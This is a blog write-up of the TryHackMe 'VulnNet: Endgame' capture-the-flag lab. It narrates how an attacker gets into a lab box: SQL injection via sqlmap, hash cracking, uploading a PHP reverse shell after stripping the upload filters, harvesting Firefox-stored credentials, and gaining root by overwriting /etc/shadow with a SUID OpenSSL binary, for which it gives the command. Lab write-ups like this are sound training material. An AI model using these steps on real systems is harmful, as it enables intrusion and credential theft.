C R E A T E & D E S T R OY


VulnNet: Endgame | TryHackMe

The end of the VulnNet series.

PORT   STATE SERVICE VERSION                                                                                                                                                                                                              
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)                                                                                                                                                         
| ssh-hostkey:                                                                                                                                                                                                                            
|   2048 bb:2e:e6:cc:79:f4:7d:68:2c:11:bc:4b:63:19:08:af (RSA)                                                                                                                                                                            
|   256 80:61:bf:8c:aa:d1:4d:44:68:15:45:33:ed:eb:82:a7 (ECDSA)                                                                                                                                                                           
|_  256 87:86:04:e9:e0:c0:60:2a:ab:87:8e:9b:c7:05:35:1c (ED25519)                                                                                                                                                                         
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                                                                                                                                                                                       
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not a lot open. We’ll start gobuster and poke at the web app, we find out we need to add vulnnet.thm to /etc/hosts.

Gobuster doesn’t find much initially but Ffuf finds a few subdomains, so we’ll keep digging.

We discover that blog.vulnnet.thm is running Typo3 CMS.

We find no usable vulnerabilities for Typo3 right now, but while browsing around the web app we see every visit to a blog post triggers a request via the API.

There appear to be SQL injection vulnerabilities with Typo3 so we’ll pop that into SQLmap and see if it comes up with anything…

It appears to be vulnerable and we see 3 databases to dump. Let’s have a look at blog and vn_admin.

Eventually we find a table (fe_users) that contains a username and hashed password.

Apparently Hashcat doesn’t handle these Argon2 hashes, so we’ll have to use JTR. Cracking the hash takes an eternity with Rockyou, but we did manage to get a big old password list from the blog database, there has to be a reason for 600 passwords in the table.

Phew, that did it. We’ve a login now for the CMS. Before we can upload a PHP reverse shell we have to change the deny filters.

We’ll remove everything from here and upload our reverse shell.

We can navigate to our shell, the directory is hidden but we know it’s there.

And like that, we pop a shell as www-data.

After enumerating for quite a while we find the user system has firefox installed, which is always worth investigating.

From one of the profiles we extract Chris_W’s tryhackme.com login details.

For a moment it looks like it’s the same as their Typo3 password, but it’s different and I’ll try it for the SSH login.

Whew, it worked. So we’ve got access now as system. We’re not allowed to run anything as sudo, so there’s another way to root.

We find that in our home directory there’s an OpenSSL binary with SUID set, GTFO bins we can use that for file read/write.

We can read /etc/shadow, dump to a file and copy the system password. Then hopefully re-write and su to root.

We can read, so we’ll output to a file and modify.
cat /tmp/shadow.txt | ./openssl enc -out /etc/shadow

With the above command, we overwrite /etc/shadow with our modified version, where root password is the same as system.

It worked, we’re now root, gobble up the flags and box done.

Leave a Reply

Your email address will not be published. Required fields are marked *